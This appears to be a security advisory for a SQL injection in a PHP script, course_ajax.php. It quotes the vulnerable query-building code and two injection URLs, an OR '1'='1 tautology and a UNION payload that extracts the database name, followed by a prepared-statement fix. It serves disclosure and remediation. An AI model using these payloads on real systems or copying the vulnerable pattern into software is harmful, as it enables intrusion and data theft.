A SQL injection vulnerability has been identified in the course_ajax.php script due to improper handling of user input. The vulnerability is associated with the `id` parameter, which is directly incorporated into a SQL query without proper validation and sanitization.

The vulnerable code snippet in course_ajax.php:
```php
$q = mysqli_query($con, "SELECT * FROM department WHERE department_id='" . $_GET['id'] . "'");
while ($res = mysqli_fetch_assoc($q)) {
    echo "<option value='" . $res['department_id'] . "'>" . $res['department_name'] . "</option>";
}
```
The direct concatenation of `$_GET['id']` into the SQL query creates an SQL injection point, allowing an attacker to manipulate the query and potentially extract, modify, or delete data from the `department` table.
To exploit this vulnerability, an attacker could use a crafted URL like the following:

```
https://localhost/course_ajax.php?id=1' OR '1'='1
```

This input would result in a manipulated SQL query:

```sql
SELECT * FROM department WHERE department_id='1' OR '1'='1'
```
Another query, for extracting the database name:

```
https://localhost/timetable/course_ajax.php?id=1'+Union+select+1,database()'
```
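The fix is to stop building the SQL text from user input. The following is an added example written for this advisory, not code from the affected project: the same lookup rewritten with a mysqli prepared statement, assuming `$con` is an open `mysqli` connection, that `department_id` is numeric (as the sample `id=1` suggests), and that the `mysqlnd` driver is available for `get_result()`.

```php
<?php
// Added example (not the original course_ajax.php): the department lookup
// with the id bound as a parameter, so its value can never change the query.
// Assumptions: $con is an open mysqli connection, department_id is an integer
// column, and mysqlnd is installed (needed for mysqli_stmt::get_result()).

function render_department_options(mysqli $con, string $raw_id): string
{
    // Validate the shape of the input first: only a run of digits is accepted.
    if (!ctype_digit($raw_id)) {
        http_response_code(400);
        return '';
    }
    $id = (int) $raw_id;

    // The SQL text holds only a placeholder; the value is sent separately,
    // so "1' OR '1'='1" or a UNION payload is just a string that fails validation
    // above, and would be a non-matching integer even if it reached the driver.
    $stmt = $con->prepare(
        "SELECT department_id, department_name FROM department WHERE department_id = ?"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $con->error);
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $result = $stmt->get_result();

    $html = '';
    while ($row = $result->fetch_assoc()) {
        // Escape on output as well, so a stored department_name cannot inject markup.
        $html .= "<option value='"
            . htmlspecialchars((string) $row['department_id'], ENT_QUOTES, 'UTF-8')
            . "'>"
            . htmlspecialchars((string) $row['department_name'], ENT_QUOTES, 'UTF-8')
            . "</option>";
    }
    $stmt->close();
    return $html;
}

echo render_department_options($con, $_GET['id'] ?? '');
```

Rejecting non-numeric `id` values with a 400 also gives the web server log a clean signal for detecting injection attempts against this endpoint.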